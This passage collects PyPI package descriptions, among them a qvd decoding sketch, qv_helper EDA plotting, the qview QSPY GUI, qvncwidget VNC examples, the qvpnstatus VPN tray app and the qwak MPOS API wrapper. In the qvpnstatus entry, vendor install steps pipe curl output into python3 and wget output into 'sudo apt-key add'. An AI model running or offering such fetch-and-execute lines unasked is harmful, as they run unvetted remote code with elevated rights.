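The flag-byte layout described in the qvd entry above maps naturally onto a small decoder, so here is a minimal pure-Python sketch of that decoding. It is written only to illustrate the documented symbol types; it is not part of the qvd package (which implements this step in Rust), and the helper name read_symbol is made up for this example.

import struct

def read_symbol(buf: bytes, pos: int):
    # Decode one symbol starting at pos, based on the flag byte that
    # precedes it, following the type list in the qvd description above.
    flag = buf[pos]
    pos += 1
    if flag == 1:    # 4-byte little-endian integer
        return struct.unpack_from("<i", buf, pos)[0], pos + 4
    if flag == 2:    # 8-byte little-endian float
        return struct.unpack_from("<d", buf, pos)[0], pos + 8
    if flag == 4:    # null-terminated string
        end = buf.index(b"\x00", pos)
        return buf[pos:end].decode("utf-8"), end + 1
    if flag == 5:    # 4 junk bytes, then a null-terminated integer string
        end = buf.index(b"\x00", pos + 4)
        return int(buf[pos + 4:end]), end + 1
    if flag == 6:    # 8 junk bytes, then a null-terminated float string
        end = buf.index(b"\x00", pos + 8)
        return float(buf[pos + 8:end]), end + 1
    raise ValueError(f"unknown symbol flag {flag}")

Each call returns the decoded value together with the offset of the next flag byte, so one column's symbols can be read by looping until the next column's byte offset (taken from the XML metadata) is reached.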
Withqv_helper, visualizations and statistical tests are no longer separated by parallel processes, achieving by just 1 line of code.While the package is specially designed for EDA, it is more recommended to be used in notebook documents instead of in the terminal.UsageInstallationInstallation is easy as the package is published in PyPI.$pipinstallqv_helperqv_groupsTo illustrate the functionalities, thePalmer penguins datasetwill be used.qv_groupstake 1 numeric variable and 1 categorical variable to build a histogram for the numeric variable and a boxplot of the numeric variable grouped by the categorical variable. When there are more than 2 classes in the grouping variable, a one-way ANOVA test will be performed.frompalmerpenguinsimportload_penguinsdf=load_penguins()fromqv_helper.qv_helperimportqv_groupsqv_groups(value='bill_length_mm',group='species',data=df,title='Bill Length in Different Species',xlabel='Bill length (mm)',ylabel='Species')Null values are dropped in statistical tests.\nTest F p\n------------- ------ ------\nOne-way ANOVA 397.30 0.0000When there are only 2 groups, t-tests will be performed automatically.qv_groups(value='bill_length_mm',group='sex',data=df,title='Bill Length in 2 Sex',xlabel='Bill length (mm)',ylabel='Sex')Null values are dropped in statistical tests.\nTest t p\n---------------------- ---- ------\nEqual var. assumed 0.00 1.0000\nEqual var. not assumed 0.00 1.0000qv_scatterqv_scattertakes 2 numeric values as arguments and plot the corresponding scatter plot. 2 correlation statistics will be printed based on the needs of users.qv_scatter(valuex='bill_length_mm',valuey='bill_depth_mm',data=df,title='Relationship between Bill Length and Bill Depth',xlabel='Bill Length (mm)',ylabel='Bill Depth (mm)')Null values are dropped in statistical tests.\nTest r p\n------------ ------- ------\nPearson's r -0.2286 0.0000\nSpearman's r -0.2139 0.0001qv_2catqv_2cattakes 2 categorical variables as arguments and plot the corresponding heatmap and a stacked barchart for to illustrate the proportion of each class ingroupxingroupy. When both of the categorical variables are with exactly 2 classes, Barnard's exact test and Fisher's exact test will also be performed.qv_2cat(groupx='species',groupy='island',data=df,title_heatmap='Count of each Species on each Island',title_bar='Proportion of each Species on each Island',xlabel='Species',ylabel='Island')Test Test statistic Value df p\n---------------- ---------------- ------- ---- ------\nChi-squared test Chi-squared 299.55 4 0.0000qv_countqv_counttakes 1 categorical variable as argument and plot a barchart. The count in numeric values will also be printed and supplemented by the the number of null values.qv_count(value='species',data=df,title='Count of each Species',label='Species')Group Count\n--------- -------\nAdelie 152\nGentoo 124\nChinstrap 68\nNA 0qv_distqv_disttakes 1 numeric variable as argument and plot a histogram. Summary statistics will be printed as well.qv_dist(value='bill_length_mm',data=df,title='Distribution of Bill Length',label='Bill Length (mm)')Null values are dropped in the chart and statistics.\nStatistics Value\n------------ -------\nMean 43.99\nVariance 29.82\nSample size 333.00\n# of NAs 0.00\nSkewness 0.05ContributingInterested in contributing? Check out the contributing guidelines. Please note that this project is released with a Code of Conduct. By contributing to this project, you agree to abide by its terms.Licenseqv_helperwas created by Morris Chan. 
It is licensed under the terms of the MIT license.Creditsqv_helperwas created withcookiecutterand thepy-pkgs-cookiecuttertemplate.Special thanks go to @MNBhat, @Lorraine97, @austin-shih, who finished an academic project inprelim_eda_helperwith me.Quick Visualizaiont Helperis inspired byprelim_eda_helper. The development of the current project is agreed by all authors ofprelim_eda_helper."} +{"package": "qvibe-recorder", "pacakge-description": "qvibe-recorderAn vibration measurement app for the RPI.Install from pypi as$ pip install qvibe-recorderDesigned to be used withqvibe-analyser"} +{"package": "qview", "pacakge-description": "The \"qview\" Python package is a powerful Visualization and Monitoring\nfacility, which allows embedded developers to create virtual Graphical\nUser Interfaces in Python to monitor and control their embedded devices\nfrom a host (desktop) computer. The interfaces created by QView can\nvisualize the data produced byQP/Spy software tracing systemand can also interact with the embedded target by sending various commands.General RequirementsThe \"qview\" package requires Python 3 with thetkinterpackage, which\nis included in theQTools distributionfor Windows and is typically included with other operating systems, such as\nLinux and MacOS.To run \"qview\" in Python, you need to first launch theQSPY console applicationto communicate with the chosen embedded target (or the host executable\nif you are simulating your embedded target).Once QSPY is running, from a separate terminal you can launchqview.pyand \"attach\" to theQSPY UDP socket.\nAfter this communication has been established, \"qview\" can interact with the\ninstrumented target and receive data from it (through QSPY).NOTEThe embedded C or C++ code running inside the target needs to be\nbuilt with theQP/Spy software tracing systeminstrumentation enabled. This is acheived by building the \"Spy\" build configuration.InstallationTheqview.pyscript can be used standalone,withoutany\ninstallation (see Using \"qview\" below).Alternatively, you caninstallqview.pywithpipfrom PyPi by\nexecuting the following command:pip install qviewOr directly from the sources directory (e.g.,/qp/qtools/qview):python setup.py install --install-dir=/qp/qtools/qviewUsing \"qview\"If you are usingqviewas a standalone Python script, you invoke\nit as follows:python /path-to-qview-script/qview.py [ [ []]]Alternatively, if you've installedqviewwithpip, you invoke\nit as follows:qview [cust_script] [qspy_host[:udp_port]] [local_port]Command-line Optionscust_script- optional customization Python scripts for your specific\ntarget sytem. If not specified, qview will provide only the generic facilities\nfor interacting with the target (e.g., reset, setting QS filters,\nposting events, etc.)qspy_host[:udp_port]- optional host-name/IP-address:port for the host\nrunning the QSPY host utility. If not specified, the default\nis 'localhost:7701'.local_port- optional the local UDP port to be used by \"qview\". If not\nspecified, the default is '0', which means that the operating sytem will\nchoose an open port.Examples (for Windows):python %QTOOLS%\\qview\\qview.pyopens the generic (not customized) \"qview\".python %QTOOLS%\\qview\\qview.py dpp.pyopens \"qview\" with the customization provided in thedpp.pyscript\nlocated in the current directory.qview ..\\qview\\dpp.py localhost:7701opens \"qview\" (installed withpip) with the customization provided in thedpp.pyscript located in the directory..\\qview. 
The \"qview\" will\nattach to the QSPY utility running atlocalhost:7701.qview dpp.py 192.168.1.100:7705opens \"qview\" (installed withpip) with the customization provided in thedpp.pyscript located in the current directory. The \"qview\" will attach to\nthe QSPY utility running remotely at IP address192.168.1.100:7705.Examples (for Linux/macOS):python $(QTOOLS)/qview/qview.pyopens the generic (not customized) \"qview\".python $(QTOOLS)/qview/qview.py dpp.pyopens \"qview\" with the customization provided in thedpp.pyscript\nlocated in the current directory.qview *.py ../qview/dpp.py localhost:7701opens \"qview\" (installed withpip) with the customization provided in thedpp.pyscript located in the directory../qview. The \"qview\" will\nattach to the QSPY utility running atlocalhost:7701.qview dpp.py 192.168.1.100:7705opens \"qview\" (installed withpip) with the customization provided in thedpp.pyscript located in the current directory. The \"qview\" will attach to\nthe QSPY utility running remotely at IP address192.168.1.100:7705.More InformationMore information about the QView Visualization and Monitoring is available\nonline at:https://www.state-machine.com/qtools/qview.htmlMore information about the QP/QSPY software tracing system is available\nonline at:https://www.state-machine.com/qtools/qpspy.html"} +{"package": "qvikconfig", "pacakge-description": "qvikconfig is a parser of a simple config file syntax called the\nqvikconfig format. The basic syntax is \u2018property = value\u2019. qvikconfig\nworks with both Python 2.6+ and Python 3.x.Licenseqvikconfig is free software under the terms of the GNU General Public\nLicense version 3 (or any later version). The author of qvikconfig is\nNiels Serup, contactable atns@metanohi.org. This is version 0.1.1 of\nthe program.InstallingIf you have python-setuptools installed, you can just do this:$ sudo easy_install qvikconfigAlternatively, download and extract the gzipped tarball found on this\nvery page, and then run this:$ sudo python setup.py installThe newest version ofqvikconfigis always available athttp://metanohi.org/projects/qvikconfig/and at the Python\nPackage Index.UsingThis module has two functions:parseanddump.parseis\nused to read config files, whiledumpis used to write config\nfiles. The basic syntax of config files isproperty = value. 
The\ncomplete documentation is included within the qvikconfig library and\ncan be accessed by executingpydoc qvikconfig.Tests of qvikconfig config files are located in thetests/directory of the distribution."} +{"package": "qviz", "pacakge-description": "No description available on PyPI."} +{"package": "qvm", "pacakge-description": "No description available on PyPI."} +{"package": "qvmake", "pacakge-description": "No description available on PyPI."} +{"package": "qvmcli", "pacakge-description": "No description available on PyPI."} +{"package": "qvncwidget", "pacakge-description": "pyQVNCWidgetVNC Widget for Python using PyQt5How to installpip3installqvncwidgetTODO:Proper error handlingonFatalErrorsupport for more than just RAW and RGB32 PIXEL_FORMATssupport for compressionimplement rfb 3.7 and 3.8implement local and remote clipboardExamples (see /examples folder)importsysfromPyQt5.QtWidgetsimportQApplication,QMainWindowfromqvncwidgetimportQVNCWidgetclassWindow(QMainWindow):def__init__(self):super(Window,self).__init__()self.setWindowTitle(\"QVNCWidget\")self.vnc=QVNCWidget(parent=self,host=\"127.0.0.1\",port=5900,password=\"1234\",readOnly=True)self.setCentralWidget(self.vnc)# if you want to resize the window to the resolution of the# VNC remote device screen, you can do thisself.vnc.onInitialResize.connect(self.resize)self.vnc.start()defcloseEvent(self,ev):self.vnc.stop()returnsuper().closeEvent(ev)app=QApplication(sys.argv)window=Window()window.resize(800,600)window.show()sys.exit(app.exec_())Example with widget input eventsimportsysfromPyQt5.QtWidgetsimportQApplication,QMainWindowfromqvncwidgetimportQVNCWidgetclassWindow(QMainWindow):def__init__(self):super(Window,self).__init__()self.setWindowTitle(\"QVNCWidget\")self.vnc=QVNCWidget(parent=self,host=\"127.0.0.1\",port=5900,password=\"1234\",readOnly=False)self.setCentralWidget(self.vnc)# we need to request focus otherwise we will not get keyboard input eventsself.vnc.setFocus()# you can disable mouse tracking if desiredself.vnc.setMouseTracking(False)self.vnc.start()defcloseEvent(self,ev):self.vnc.stop()returnsuper().closeEvent(ev)app=QApplication(sys.argv)window=Window()window.resize(800,600)window.show()sys.exit(app.exec_())Example with window input eventsIn this example we are passing input events from the window to the widgetimportsysfromPyQt5.QtWidgetsimportQApplication,QMainWindowfromqvncwidgetimportQVNCWidgetclassWindow(QMainWindow):def__init__(self):super(Window,self).__init__()self.setWindowTitle(\"QVNCWidget\")self.vnc=QVNCWidget(parent=self,host=\"127.0.0.1\",port=5900,password=\"1234\",readOnly=False)self.setCentralWidget(self.vnc)# you can disable mouse tracking if desiredself.vnc.setMouseTracking(False)self.vnc.start()defkeyPressEvent(self,ev):self.vnc.keyPressEvent(ev)returnsuper().keyPressEvent(ev)# in case you need the signal somewhere else in the windowdefkeyReleaseEvent(self,ev):self.vnc.keyReleaseEvent(ev)returnsuper().keyReleaseEvent(ev)# in case you need the signal somewhere else in the windowdefcloseEvent(self,ev):self.vnc.stop()returnsuper().closeEvent(ev)app=QApplication(sys.argv)window=Window()window.resize(800,600)window.show()sys.exit(app.exec_())Referenceshttps://datatracker.ietf.org/doc/html/rfc6143https://vncdotool.readthedocs.io/en/0.8.0/rfbproto.html?highlight=import#string-encodings"} +{"package": "qvpnstatus", "pacakge-description": "QVpnStatusVPN Status tray icon for monitoring VPN connections from nmcli. 
Allows you to specify interval to check and also toggle off sound notifications.See linkherefor more information.It is based on mycopier-poetry-fbsskeleton which uses PyQT5 for the GUI elements andfbsfor the installer creation.Installation###Debian/Ubuntu/Mint Linux InstallationManual Installer link without automatic updates.https://fbs.sh/qvpnstatus/qvpnstatus/qvpnstatus.deb###Install from website.wgethttps://fbs.sh/qvpnstatus/qvpnstatus/qvpnstatus.deb\nsudodpkg-iqvpnstatus.deb####To install with automatic updates supported via repo.sudoapt-getinstall-yapt-transport-https\nwget-qO-https://fbs.sh/qvpnstatus/qvpnstatus/public-key.gpg|sudoapt-keyadd-echo'deb [arch=amd64] https://fbs.sh/qvpnstatus/qvpnstatus/deb stable main'|sudotee/etc/apt/sources.list.d/qvpnstatus.list\nsudoapt-getupdate;sudoapt-getinstall-yqvpnstatusInstallation is done into /opt/qvpnstatus/###Arch Linux Installation####Manual Installer link without automatic updates.https://fbs.sh/qvpnstatus/qvpnstatus/qvpnstatus.pkg.tar.xz####To install with automatic updates supported via repo.curl-Ohttps://fbs.sh/qvpnstatus/qvpnstatus/public-key.gpg&&sudopacman-key--addpublic-key.gpg&&sudopacman-key--lsign-key9EF5FD1B7714354D0535303CFF1B29F26A1378E8&&rmpublic-key.gpgecho-e'\\n[qvpnstatus]\\nServer = https://fbs.sh/qvpnstatus/qvpnstatus/arch'|sudotee-a/etc/pacman.conf\nsudopacman-SyuqvpnstatusIf you already have the app installed, you can force an immediate update via:sudopacman-Syu--neededqvpnstatusInstallation viapip:python3.7-mpipinstallqvpnstatusInstallation viapipx:python3.7-mpipinstall--userpipx\n\npipxinstall--pythonpython3.7qvpnstatusDev RequirementsQVpnStatus requires Python 3.7 or above.To install Python 3.7, I recommend usingpyenv.# install pyenvgitclonehttps://github.com/pyenv/pyenv~/.pyenv# setup pyenv (you should also put these three lines in .bashrc or similar)exportPATH=\"${HOME}/.pyenv/bin:${PATH}\"exportPYENV_ROOT=\"${HOME}/.pyenv\"eval\"$(pyenvinit-)\"# install Python 3.7pyenvinstall3.7.12# make it available globallypyenvglobalsystem3.7.12Creating a native installerclone the repo locallygit clone git@gitlab.com:mikeramsey/qvpnstatus.gitInstallpoetrycurl -sSL https://raw.githubusercontent.com/python-poetry/poetry/master/get-poetry.py | python3 -Setting the below settings are highly recommended for ensuring the virtual environment poetry makes is located inside the project folder.poetry config virtualenvs.create true; poetry config virtualenvs.in-project true;Runpoetry installin the path to install all the dependenciesEnter the virtual environment that poetry created. This can be found by runningpoetry env infoSee alsohereRunfbs freezeand thenfbs installerafterwards if the frozen \"compiled\" app runs without issues. Seeherefor more on how fbs works. 
And alsohereCreditsSpecial thanks to below references and resources.Resources:\nPython nmcli api package which made this a breeze:https://github.com/ushiboy/nmclihttps://pypi.org/project/nmcli/References:https://www.learnpyqt.com/tutorials/system-tray-mac-menu-bar-applications-pyqt/https://itectec.com/ubuntu/ubuntu-connect-disconnect-from-vpn-from-the-command-line/https://www.devdungeon.com/content/python3-qt5-pyqt5-tutorial#toc-9"} +{"package": "qvpy", "pacakge-description": "UNKNOWN"} +{"package": "qvrpy", "pacakge-description": "qvrpy - python interface to QVR ProThis is a high-level abstraction of the interface to theQVR Prosurveillance system byQNAPThe specifications for the raw QVR Pro API can be foundat this link."} +{"package": "qvsed", "pacakge-description": "QVSED is a volatile and small text editor.\u201cVolatile\u201d means that QVSED is entirely stateless - once you open a file, QVSED doesn\u2019t store any file paths or any other data other than the text contents of the file you loaded.\nAdditionally, QVSED won\u2019t prompt you if you\u2019re about to potentially lose an unsaved file, since it doesn\u2019t know of any file metadata.\nYou may be prompted if you\u2019re about to overwrite a file, but that\u2019s up to your OS, not QVSED.QVSED follows the philosophy of ultra-minimalism, with its heavy emphasis on just editing text and nothing more.\nQVSED\u2019s editing style is text-based, not file-based like basically every other editor out there.\nText goes in, from a file, and then text later comes out, into another or perhaps the same file.QVSED can be used as a simple scratchpad or throwaway editor, as well as a general editing software application, since it won\u2019t prompt you if you do anything destructive.\nIt stays out of your way on many occasions. Whether or not that\u2019s a good thing is up to you."} +{"package": "qvsr-otree-demo1", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qvstbus", "pacakge-description": "No description available on PyPI."} +{"package": "qvtool", "pacakge-description": "No description available on PyPI."} +{"package": "qw", "pacakge-description": "qw==qw (or QueueWorker) is used to run worker processes which listen on a redis list for jobs to process.## Setup### pip`pip install qw`### git```git clone git://github.com/brettlangdon/qw.gitcd ./qwpython setup.py install```## Design### ManagerThe manager is simply a process manager. It's job is to start/stop worker sub-processes.### WorkerThe workers are processes which sit and listen for jobs on a few queues and then processthose jobs.### TargetThe worker/manager take a `target` which can be either a function or a string (importable function).```pythondef target(job_id, job_data):passmanager = Manager(target)# ORmanager = Manager('__main__.target')```### QueuesThere are a few different queues that are used. 
The job queues are just redis lists, manager/worker lists are sets and jobs are hashes.A worker picks up a job from either `all:jobs`, `:jobs` or `:jobs`, pulls the corresponding `job:` key andprocesses it with the provided `target`, after processing it will then remove the `job:` key as well as the job id fromthe `:jobs` queue.* `all:managers` - a set of all managers* `all:jobs` - a queue that all workers can pull jobs from, the values are just the job ids* `job:` - a hash of the job data* `:workers` - a set of all workers belonging to a given manager* `:jobs` - a queue of jobs for a specific manager, workers will try to pull from here before `all:jobs`, the values are just the job ids* `:jobs` - a queue of jobs for a specific worker, this is meant as a in progress queue for each worker, the workers will pull jobs into this queue from either `:jobs` or `all:jobs`, the values are just the job ids## Basic Usage```pythonfrom qw.manager import Managerdef job_printer(job_id, job_data):print job_idprint job_datamanager = Manager(job_printer)manager.start()manager.join()```## API### Manager(object)* `__init__(self, target, host=\"localhost\", port=6379, db=0, num_workers=None, name=None)`* `start(self)`* `stop(self)`* `join(self)`### Worker(multiprocess.Process)* `__init__(self, client, target, manager_name=None, timeout=10)`* `run(self)`* `shutdown(self)`### Client(redis.StrictRedi)* `__init__(self, host=\"localhost\", port=6379, db=0)`* `register_manager(self, name)`* `deregister_manager(self, name)`* `register_worker(self, manager, name)`* `deregister_worker(self, manager, name)`* `queue_job(self, job_data, manager=None, worker=None)`* `fetch_next_job(self, manager, worker, timeout=10)`* `finish_job(self, job_id, worker_name)`* `get_all_managers(self)`* `get_manager_workers(self, manager_name)`* `get_worker_pending_jobs(self, worker_name)`* `get_manager_queued_jobs(self, manager_name)`* `get_all_queued_jobs(self)`* `get_all_pending_jobs(self)`## CLI Tools### qw-managerThe `qw-manager` tool is used to start a new manager process with the provided `target` string, which gets runfor every job processed by a worker.```$ qw-manager --helpUsage:qw-manager [--level=] [--workers=] [--name=] [--host=] [--port=] [--db=] qw-manager (--help | --version)Options:--help Show this help message--version Show version information-l --level= Set the log level (debug,info,warn,error) [default: info]-w --workers= Set the number of workers to start, defaults to number of cpus-n --name= Set the manager name, defaults to hostname-h --host= Set the redis host to use [default: localhost]-p --port= Set the redis port to use [default: 6379]-d --db= Set the redis db number to use [default: 0]```### qw-clientThe `qw-client` command is useful to look at basic stats of running managers, workers and job queuesas well as to push json data in the form of a string or a file to the main queue or a manager specific queue.```$ qw-client --helpUsage:qw-client [--host=] [--port=] [--db=] managersqw-client [--host=] [--port=] [--db=] workers []qw-client [--host=] [--port=] [--db=] jobs []qw-client [--host=] [--port=] [--db=] queue string []qw-client [--host=] [--port=] [--db=] queue file []qw-client (--help | --version)Options:--help Show this help message--version Show version information-h --host= Set the redis host to use [default: localhost]-p --port= Set the redis port to use [default: 6379]-d --db= Set the redis db number to use [default: 0]```"} +{"package": "qwack", "pacakge-description": "qwack: a quickly writtenhack(1985) 
variant for Python."} +{"package": "qwackchat", "pacakge-description": "No description available on PyPI."} +{"package": "qwak", "pacakge-description": "qwak is an APACHE licensed library written in Python designed to provide\na simple to use API wrapper forMPOS.Installation:From source use$ python setup.py installor install from PyPi$ pip install qwakConfiguration:Create a~/.qwak_config.pyfile and fill in your pool URL and API\nkey like so:#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nconfig = {\n 'pool_url': 'http://example.com',\n 'api_key' : '12345abcde'\n}API Documentation:qwakhandles all the API calls MPOS provides. Examples kindly\nprovided byscript.io.Pool:Public:>>> import qwak\n>>> qwak.public()\n{\n \"pool_name\": \"Scrypt.io | HBN Pool\",\n \"last_block\": 817675,\n \"workers\": 33,\n \"shares_this_round\": 20764,\n \"network_hashrate\": 573459242.17,\n \"hashrate\": 46773\n}Pool info:>>> qwak.pool_info()\n{\n \"getpoolinfo\": {\n \"version\": \"1.0.0\",\n \"data\": {\n \"coinname\": \"HoboNickels\",\n \"algorithm\": \"scrypt\",\n \"txfee\": null,\n \"min_ap_threshold\": 5,\n \"cointarget\": \"30\",\n \"stratumport\": \"37373\",\n \"payout_system\": \"prop\",\n \"currency\": \"HBN\",\n \"max_ap_threshold\": 5000,\n \"fees\": 0.5,\n \"coindiffchangetarget\": 5\n },\n \"runtime\": 0.99682807922363\n }\n}Pool status:>>> qwak.pool_status()\n{\n \"getpoolstatus\": {\n \"version\": \"1.0.0\",\n \"data\": {\n \"nethashrate\": 614243980.49,\n \"pool_name\": \"Scrypt.io | HBN Pool\",\n \"nextnetworkblock\": 817770,\n \"currentnetworkblock\": 817769,\n \"estshares\": 13180.24593408,\n \"workers\": 34,\n \"networkdiff\": 12.87133392,\n \"timesincelast\": 2816,\n \"efficiency\": 98.81,\n \"lastblock\": 817675,\n \"esttime\": 1160.4105424495,\n \"hashrate\": 47640\n },\n \"runtime\": 5.7098865509033\n }\n}Pool hashrate:>>> qwak.pool_hashrate()\n{\n \"getpoolhashrate\": {\n \"version\": \"1.0.0\",\n \"data\": 47591,\n \"runtime\": 32.737016677856\n }\n}Pool sharerate:>>> qwak.pool_sharerate()\n{\n \"gethourlyhashrates\": {\n \"version\": \"1.0.0\",\n \"data\": {\n \"mine\": false,\n \"pool\": {\n \"20\": 41289,\n \"21\": 40548,\n \"22\": 38363,\n \"23\": 40847,\n \"1\": 38504,\n \"0\": 38877,\n \"3\": 38939,\n \"2\": 37899,\n \"5\": 39439,\n \"4\": 39971,\n \"7\": 40100,\n \"6\": 40040,\n \"9\": 39971,\n \"8\": 40278,\n \"11\": 40320,\n \"10\": 40180,\n \"13\": 39690,\n \"12\": 39268,\n \"15\": 38260,\n \"14\": 40554,\n \"17\": 41645,\n \"16\": 38543,\n \"19\": 39174,\n \"18\": 12647\n }\n },\n \"runtime\": 1261.7139816284\n }\n}Pool workers:>>> qwak.current_workers()\n{\n \"getcurrentworkers\": {\n \"version\": \"1.0.0\",\n \"data\": 32,\n \"runtime\": 1.2381076812744\n }\n}Pool top contributors:>>> qwak.top_contributors()\n{\n \"gettopcontributors\": {\n \"version\": \"1.0.0\",\n \"data\": {\n \"hashes\": {\n \"account\": \"hip_Hobo\",\n \"hashrate\": 370.5\n },\n \"shares\": [\n {\n \"account\": \"SaschaAc\",\n \"shares\": 731\n },\n {\n \"account\": \"unick\",\n \"shares\": 353\n },\n {\n \"account\": \"ubuntufreak\",\n \"shares\": 264\n },\n {\n \"account\": \"graymatter\",\n \"shares\": 157\n },\n {\n \"account\": \"Meska\",\n \"shares\": 109\n },\n {\n \"account\": \"splint9ka\",\n \"shares\": 107\n },\n {\n \"account\": \"licocraft\",\n \"shares\": 96\n },\n {\n \"account\": \"lepetitdiable\",\n \"shares\": 82\n },\n {\n \"account\": \"interfuse\",\n \"shares\": 67\n },\n {\n \"account\": \"anonymous\",\n \"shares\": 56\n },\n {\n \"account\": \"goldfeverhobo\",\n \"shares\": 
50\n },\n {\n \"account\": \"fonky\",\n \"shares\": 31\n },\n {\n \"account\": \"Eight\",\n \"shares\": 22\n },\n {\n \"account\": \"hip_Hobo\",\n \"shares\": 21\n },\n {\n \"account\": \"zelszels\",\n \"shares\": 21\n }\n ]\n },\n \"runtime\": 2.6769638061523\n }\n}Blocks:Estimated time to next block:>>> qwak.estimated_time()\n{\n \"getestimatedtime\": {\n \"version\": \"1.0.0\",\n \"data\": 63541.382146264,\n \"runtime\": 2724.8191833496\n }\n}Time since last block:>>> qwak.block_last()\n{\n \"gettimesincelastblock\": {\n \"version\": \"1.0.0\",\n \"data\": 3028,\n \"runtime\": 1.3439655303955\n }\n}Block count:>>> qwak.block_count()\n{\n \"getblockcount\": {\n \"version\": \"1.0.0\",\n \"data\": 817779,\n \"runtime\": 1.6119480133057\n }\n}Blocks found on pool:>>> qwak.blocks_found()\n{\n \"getblocksfound\": {\n \"version\": \"1.0.0\",\n \"data\": [\n {\n \"estshares\": 12862,\n \"worker_name\": \"SaschaAc.6\",\n \"account_id\": 226,\n \"blockhash\": \"000000000efea095fd26518b19820b870e9086e93855f4977e1766f7e9b711c0\",\n \"is_anonymous\": 0,\n \"shares\": 1993,\n \"height\": 817675,\n \"difficulty\": 12.56077319,\n \"amount\": 5,\n \"confirmations\": 25,\n \"time\": 1399218719,\n \"share_id\": 85212233,\n \"id\": 23245,\n \"finder\": \"SaschaAc\",\n \"accounted\": 1\n },\n ...\n {\n \"estshares\": 14183,\n \"worker_name\": \"SaschaAc.5\",\n \"account_id\": 226,\n \"blockhash\": \"0000000008898c8e8b613db2a7c83aa0f972de19826db8ec7b8bfbed8f4b477d\",\n \"is_anonymous\": 0,\n \"shares\": 4951,\n \"height\": 815667,\n \"difficulty\": 13.85024985,\n \"amount\": 5,\n \"confirmations\": 25,\n \"time\": 1399159614,\n \"share_id\": 84650456,\n \"id\": 23211,\n \"finder\": \"SaschaAc\",\n \"accounted\": 1\n }\n ],\n \"runtime\": 1.2688636779785\n }\n}Block stats:>>> qwak.block_stats()\n{\n \"getblockstats\": {\n \"version\": \"1.0.0\",\n \"data\": {\n \"12MonthShares\": \"82306047\",\n \"1HourEstimatedShares\": 26298,\n \"1HourDifficulty\": 25.6816834,\n \"7DaysShares\": \"6701309\",\n \"7DaysDifficulty\": 5816.95565409,\n \"12MonthAmount\": 115530,\n \"TotalValid\": \"23106\",\n \"24HourDifficulty\": 642.6008193,\n \"24HourTotal\": \"48\",\n \"TotalDifficulty\": 71859.73857944,\n \"7DaysAmount\": 2280,\n \"24HourValid\": \"48\",\n \"4WeeksOrphan\": \"32\",\n \"7DaysOrphan\": \"0\",\n \"1HourAmount\": 10,\n \"12MonthOrphan\": \"134\",\n \"12MonthTotal\": \"23240\",\n \"4WeeksTotal\": \"3047\",\n \"1HourOrphan\": \"0\",\n \"TotalEstimatedShares\": 73584372,\n \"12MonthValid\": \"23106\",\n \"24HourShares\": \"828972\",\n \"4WeeksValid\": \"3015\",\n \"12MonthEstimatedShares\": 73584372,\n \"7DaysEstimatedShares\": 5956563,\n \"12MonthDifficulty\": 71859.73857944,\n \"TotalShares\": \"82306047\",\n \"TotalAmount\": 115530,\n \"24HourOrphan\": \"0\",\n \"7DaysValid\": \"456\",\n \"24HourEstimatedShares\": 658023,\n \"4WeeksAmount\": 15075,\n \"24HourAmount\": 240,\n \"7DaysTotal\": \"456\",\n \"1HourShares\": \"39467\",\n \"1HourValid\": \"2\",\n \"4WeeksDifficulty\": 22239.12019247,\n \"1HourTotal\": \"2\",\n \"4WeeksEstimatedShares\": 22772859,\n \"4WeeksShares\": \"25594317\",\n \"TotalOrphan\": \"134\",\n \"Total\": 23240\n },\n \"runtime\": 203.04179191589\n }\n}Network:Difficulty:>>> qwak.difficulty()\n{\n \"getdifficulty\": {\n \"version\": \"1.0.0\",\n \"data\": 13.11145585,\n \"runtime\": 1.8680095672607\n }\n}User:User status:>>> qwak.user_status()\n{\n \"getuserstatus\": {\n \"version\": \"1.0.0\",\n \"data\": {\n \"username\": \"username\",\n \"sharerate\": \"1.27\",\n \"hashrate\": 
5312.79,\n \"shares\": {\n \"username\": \"username\",\n \"is_anonymous\": 0,\n \"invalid\": 1,\n \"donate_percent\": 0,\n \"valid\": 42,\n \"id\": 40\n }\n },\n \"runtime\": 199.51820373535\n }\n}User balance:>>> qwak.user_balance()\n{\n \"getuserbalance\": {\n \"version\": \"1.0.0\",\n \"data\": {\n \"confirmed\": 8.22416031,\n \"orphaned\": 6.99071406,\n \"unconfirmed\": 1.65332559\n },\n \"runtime\": 19.626140594482\n }\n}User hashrate:>>> qwak.user_hashrate()\n{\n \"getuserhashrate\": {\n \"version\": \"1.0.0\",\n \"data\": 5474,\n \"runtime\": 14.457941055298\n }\n}User sharerate:>>> qwak.user_sharerate()\n{\n \"getusersharerate\": {\n \"version\": \"1.0.0\",\n \"data\": \"1.42\",\n \"runtime\": 1.2180805206299\n }\n}User transactions:>>> qwak.user_transactions()\n{\n \"getusertransactions\": {\n \"version\": \"1.0.0\",\n \"data\": {\n \"transactionsummary\": {\n \"Fee\": 482.61430904998,\n \"TXFee\": 238.79999999999,\n \"Credit\": 115545.00010462,\n \"Donation\": 43.14081271,\n \"Debit_AP\": 96526.28776731,\n \"Debit_MP\": 16190.69451484\n },\n \"transactions\": [\n {\n \"username\": \"unick\",\n \"blockhash\": \"000000000717fb23284487ffc964af5d39a25e58cf47ca30c44aef777e4aee57\",\n \"coin_address\": null,\n \"timestamp\": \"2014-05-04 19:09:05\",\n \"txid\": null,\n \"amount\": 0.00382566,\n \"confirmations\": 10,\n \"height\": 817836,\n \"type\": \"Fee\",\n \"id\": 898454\n },\n {\n \"username\": \"unick\",\n \"blockhash\": \"000000000717fb23284487ffc964af5d39a25e58cf47ca30c44aef777e4aee57\",\n \"coin_address\": null,\n \"timestamp\": \"2014-05-04 19:09:05\",\n \"txid\": null,\n \"amount\": 0.76513133,\n \"confirmations\": 10,\n \"height\": 817836,\n \"type\": \"Credit\",\n \"id\": 898453\n },\n {\n \"username\": \"zelszels\",\n \"blockhash\": \"000000000717fb23284487ffc964af5d39a25e58cf47ca30c44aef777e4aee57\",\n \"coin_address\": null,\n \"timestamp\": \"2014-05-04 19:09:05\",\n \"txid\": null,\n \"amount\": 0.00023474,\n \"confirmations\": 10,\n \"height\": 817836,\n \"type\": \"Fee\",\n \"id\": 898452\n },\n {\n \"username\": \"zelszels\",\n \"blockhash\": \"000000000717fb23284487ffc964af5d39a25e58cf47ca30c44aef777e4aee57\",\n \"coin_address\": null,\n \"timestamp\": \"2014-05-04 19:09:05\",\n \"txid\": null,\n \"amount\": 0.04694836,\n \"confirmations\": 10,\n \"height\": 817836,\n \"type\": \"Credit\",\n \"id\": 898451\n },\n {\n \"username\": \"interfuse\",\n \"blockhash\": null,\n 